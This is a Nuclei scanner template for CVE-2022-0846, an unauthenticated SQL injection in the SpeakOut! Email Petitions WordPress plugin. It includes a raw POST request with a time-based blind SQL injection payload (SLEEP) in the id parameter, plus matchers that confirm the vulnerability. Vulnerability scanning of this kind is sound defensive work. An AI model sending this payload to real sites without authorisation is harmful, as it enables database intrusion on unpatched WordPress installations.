nuclei-templates/http/cves/2022/CVE-2022-0846.yaml

48 lines
1.9 KiB
YAML

id: CVE-2022-0846
info:
name: SpeakOut Email Petitions < 2.14.15.1 - SQL Injection
author: theamanrawat
severity: critical
description: |
The SpeakOut! Email Petitions WordPress plugin before 2.14.15.1 does not sanitise and escape the id parameter before using it in a SQL statement via the dk_speakout_sendmail AJAX action, leading to an SQL Injection exploitable by unauthenticated users.
remediation: Fixed in version 2.14.15.1
reference:
- https://wpscan.com/vulnerability/b030296d-688e-44a4-a48a-140375f2c5f4
- https://wordpress.org/plugins/speakout/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0846
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-0846
cwe-id: CWE-89
epss-score: 0.05057
epss-percentile: 0.92067
cpe: cpe:2.3:a:speakout\!_email_petitions_project:speakout\!_email_petitions:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: speakout\!_email_petitions_project
product: speakout\!_email_petitions
framework: wordpress
tags: wordpress,wp-plugin,wp,unauth,wpscan,cve,cve2022,sqli,speakout,speakout-email-petitions
http:
- raw:
- |
@timeout: 20s
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=dk_speakout_sendmail&id=12+AND+(SELECT+5023+FROM+(SELECT(SLEEP(6)))Fvrh)--+VoFu
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "Your signature has been added") || contains(body, "This petition has already been signed using your email address")'
condition: and
# digest: 490a00463044022006ea36c7c1e3d5b95a317bdbaccace35b1e0edae967ba996b8f70551ad23823c02207e51405aa3fde887295e5b264ad4feca4ecbbdd74c4fb1bae8ffd8a9d1dda048:922c64590222798bb761d5b6d8e72950